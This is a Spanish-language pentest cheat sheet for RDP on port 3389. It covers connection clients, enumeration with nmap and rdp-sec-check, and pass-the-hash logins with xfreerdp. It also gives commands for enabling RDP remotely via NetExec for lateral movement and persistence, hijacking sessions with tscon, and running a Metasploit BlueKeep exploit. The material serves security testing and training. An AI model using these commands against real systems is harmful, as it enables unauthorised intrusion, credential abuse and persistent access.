RDP - 3389/TCP

Conexión remota a servicios RDP

Windows

mstsc

https://learn.microsoft.com/es-es/windows-server/administration/windows-commands/mstsc

IP='192.168.1.100'
PORT='3389'
mstsc /v:$IP:$PORT

Linux

rdesktop

Cliente RDP clásico para sistemas Linux.

DOMAIN='xtormincorp.local'
USER='Administrator'
PASS='password123'
IP='192.168.1.100'

rdesktop -u $USER -p $PASS $IP
rdesktop -d $DOMAIN -u $USER -p $PASS $IP

xfreerdp

Cliente RDP moderno y versátil, soporta autenticación por contraseña o hash NTLM.

DOMAIN='xtormincorp.local'
USER='Administrator'
PASS='password123'
HASH='xxxxxxxxxxx'
IP='192.168.1.100'

xfreerdp /u:$DOMAIN\$USER /p:$PASS /v:$IP /cert:ignore
xfreerdp /u:$DOMAIN\$USER /pth:$HASH /v:$IP /cert:ignore +clipboard /dynamic-resolution

Remmina

Cliente gráfico multiplataforma.

sudo apt install remmina

CLI:

remmina -c rdp://$USER@$IP
remmina -c rdp://$DOMAIN\\$USER@$IP
remmina -c rdp://$USER:$PASS@$IP

GUI:

Enumeración

Nmap

Enumeración de versión, cifrado y detección de vulnerabilidades:

nmap -p 3389 -sV -oA nmap/rdp_service -iL scope/scope.txt

nmap -T4 -p 3389 --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -oA nmap/rdp_scripts -iL scope/scope.txt

rdp-sec-check

Herramienta en Perl para auditar la configuración de seguridad de RDP.

git clone "https://github.com/CiscoCXSecurity/rdp-sec-check.git"

IP='192.168.1.100'
./rdp-sec-check.pl $IP

./rdp-sec-check.pl --file scope.txt --timeout 15 --retries 3 --outfile rdpseccheck.log --verbose

[AD] Equipos dentro del grupo "Remote Desktop Users"

Enumeración de equipos que pertenecen al grupo de RDP.

Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" | select -expand ComputerName

Técnicas

Habilitar servicio RDP remotamente

Mediante el módulo -M rdp de NetExec es posible habilitar el servicio RDP en un host Windows remoto utilizando credenciales válidas de un usuario con privilegios administrativos. Esto se realiza a través de SMB, modificando internamente el registro del sistema remoto.

Objetivo: Habilitar RDP para permitir el acceso remoto al escritorio del sistema comprometido, facilitando el movimiento lateral o la persistencia en entornos Windows.

Para ello:

• Internamente, se modifican claves del registro para habilitar fDenyTSConnections y abrir el puerto 3389 si es necesario.

• Requiere privilegios administrativos válidos sobre el host remoto.

• No establece una sesión RDP, solo habilita el servicio.

DOMAIN='xtormincorp.local'
USER='Administrator'
PASS='password123'
HASH='xxxxxxxxxxx'
IP='192.168.1.100'

netexec smb $IP -u $USER -p $PASS -M rdp -o ACTION=enable
netexec smb $IP -u $DOMAIN\\$USER -p $PASS -M rdp -o ACTION=enable

Permite al atacante preparar el entorno para una conexión interactiva, facilita el movimiento lateral (usando herramientas como xfreerdp, rdesktop, rubeus o incluso RDP GUI), y puede establecer una puerta de entrada persistente si no se detecta y revierte.

Clasificación MITRE ATT&CK:

Ataques

Secuestro de sesión RDP (tscon)

Requiere privilegios en el sistema remoto con sesión activa.

query user
tscon $ID /dest:$SESSIONNAME

Vulnerabilidades

Bluekeep - CVE-2019-0708

https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2019-0708

msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS TARGET_IP
set LHOST YOUR_IP
exploit

Referencias

• https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/rdp-sessions-abuse.html

• https://0xss0rz.gitbook.io/0xss0rz/pentest/protocols/rdp-3389

• https://attack.mitre.org/techniques/T1563/002/

• https://cheatsheet.haax.fr/windows-systems/exploitation/rdp_exploitation/